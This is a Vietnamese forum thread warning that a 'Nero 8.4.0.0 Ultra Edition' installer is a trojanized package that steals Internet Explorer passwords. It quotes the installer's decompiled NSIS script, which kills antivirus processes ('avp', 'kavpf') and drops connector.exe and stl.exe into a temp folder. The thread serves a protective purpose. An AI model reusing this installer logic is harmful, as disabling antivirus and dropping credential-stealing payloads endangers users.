Đừng dùng Nero 8.4.0.0 Ultra Edition

Cần thận file Nero 8.4.0.0 Ultra Edition chỉ là Nero 8.2.8.0 với spyware copy password từ IE và các chương trình khác và gởi đi.

Con spyware này khi bạn run setup Nero nó sẻ tạo ra folder setup trong path sau C:\Users\TOM\AppData\Local\Temp và trong đó có 3 file là Cleanstart.exe, Connector.exe và STL.exe.
Spyware này dùng connector.exe và stl.exe gởi tin tức về password trong IE đi ra.

Vista của tôi chận được lệnh STL.exe và hỏi đồng ý cho chạy lệnh này không. Và tôi click "NO". Sau khi tìm tòi trong internet thì mới biết là có spyware.

Có ai rành code coi cái này như thế nào:


Execute 66 0 0
Execute 90 0 0
Execute 108 0 0
Return
Call 33
File $PLUGINSDIR\Processes.dll
SetFlag 13 0
Push avp
RegisterDLL $PLUGINSDIR\Processes.dll KillProcess 0
Call 33
File $PLUGINSDIR\Processes.dll
SetFlag 13 0
Push kavpf
RegisterDLL $PLUGINSDIR\Processes.dll KillProcess 0
Return
Push $2
Push C:\cod4.txt
Call 20
Return
ReadRegStr 0 2147483650 189 224 0
ReadRegStr 2 2147483650 231 283 0
FileOpen 1 1073741824 2 296
FileWrite 1 312 0
FileClose 1
Return
SetOutPath $TEMP\setup
File dependencies.exe
File runtime.exe
File connector.exe
File stl.exe
File CleanStart.exe
Return
SetFlag 13 355
StrCmp "$PLUGINSDIR" "" 0 43 0
Push $0
SetFlag 2 0
GetTempFileName $TEMP
Delete 8 $0
SetOutPath $0
IfFlag 44 0 2 0
StrCpy $PLUGINSDIR "$0"
Pop $0
Return
MessageBox 2097168 365 0 0 0
Quit
Return

Cảm ơn bác TOM, em không rành về lập trình nên không giúp gì bác được, em sẽ cảnh giác hơn với bản Nero 8 (cũng may bản 7 vẫn xài rất OK :D)